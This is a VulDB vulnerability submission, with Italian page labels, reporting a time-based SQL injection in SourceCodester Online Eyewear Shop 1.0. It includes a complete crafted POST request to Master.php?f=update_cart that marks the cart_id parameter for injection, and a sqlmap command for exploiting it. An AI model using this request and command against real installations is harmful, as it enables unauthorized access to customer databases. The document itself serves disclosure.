| Titolo | SourceCodester Online Eyewear Shop 1.0 SQL Injection |
|---|
| Descrizione | The application Online Eyewear Shop 1.0 is vulnerable to SQL Injection Time-based attacks.
The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL:
- http://localhost/oews/classes/Master.php?f=update_cart
The vulnerable function corresponds to "update_cart" within the following source code file:
- oews/classes/Master.php
The vulnerable parameter "cart_id" is reported inside the following POST request's body:
'''
POST /oews/classes/Master.php?f=update_cart HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 29
Origin: http://localhost
Connection: close
Referer: http://localhost/oews/?p=cart_list
Cookie: PHPSESSID=<customer-session-cookie>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
cart_id=*&qty=7
'''
The above request can be directly employed within the "sqlmap" tool:
$ sqlmap -r req.txt -b --dbms "MySQL" |
|---|
| Utente | pcontiCP (UID 40374) |
|---|
| Sottomissione | 06/02/2023 16:31 (3 anni fa) |
|---|
| Moderazione | 06/02/2023 19:50 (3 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 220245 [SourceCodester Online Eyewear Shop 1.0 HTTP POST Request Master.php?f=update_cart cart_id iniezione SQL] |
|---|
| Punti | 17 |
|---|